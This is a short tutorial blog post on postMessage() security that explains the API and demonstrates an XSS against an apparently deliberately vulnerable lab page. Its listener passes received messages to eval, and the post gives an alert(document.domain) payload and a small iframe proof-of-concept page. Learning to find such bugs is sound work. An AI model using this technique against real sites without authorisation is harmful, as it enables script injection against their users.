postMessage() security

Sumeet darekar
3 min readApr 30, 2024


postMessage() method

This method enables communication between two pages iff they originates from same protocol , port Number. It provides secure mechanism for communication if set properly.

In communication two methods are used generally :

  1. postMessage() : sends data
  2. addEventListener() : Listen for data


  1. postMessage() :
postMessage(message, targetOrigin)
postMessage(message, targetOrigin,transfer)

message => data/payload you want to send to other windows.

targetOrigin => Origin of target which will get the message if target does not match with Origin then message won’t be send, or “*” can be specify as targetOrigin which means target window can have any origin.

2. addEventListener() :

addEventListener("message",function ()=>{
//whatever contend
}, true/false)

message => data/payload send from the other window

function => tells what action will be perform when data/payload is received.

More info :

Where is the Bug

Firstly, to exploit postMessage bug application should use web messaging. If application is using web messaging then the listener ( addEventListener ) should be identified.

Tool to Identify listeners :

postMessage extension created by frans rosen :

Crome :

Firefox [forked from fransr]:

vulnerabilities that can be found in postMessage are : XSS , Inforamation Disclosure , Authentication misconf and many more

Example : Describing Bug

This application is vulnerable to poseMessage() XSS, So let’s exploit it

First identify if their is any listener on application using above extension

Yes their is a addEventListener() method in javascript, lets analyse it

So, the application is taking our payload/data and putting in eval function for further analysis.As our payload/data is ending up in eval function so let’s run javascript there.

Open console by pressing ‘Esc’ button then send malicious postMessage() payload.

By using alert() we can pop-up a alert which show that we can run javascript on the application.

payload = window.postMessage('alert(document.domain)','*')

now, exploiting the vulnerability by using iframe() on

Code to exploit :

<!DOCTYPE html>

<meta charset="utf-8">
<meta name="viewport" content="width=device-width">
<link href="style.css" rel="stylesheet" type="text/css" />

function exploit(){
payload = "alert(document.domain)"
document.getElementById("target").contentWindow.postMessage(payload, "*")

Hello world
<iframe src="" id="target" onload="exploit()">
<script src="script.js"></script>


More Resources :

More practise labs :

sayonara ^_^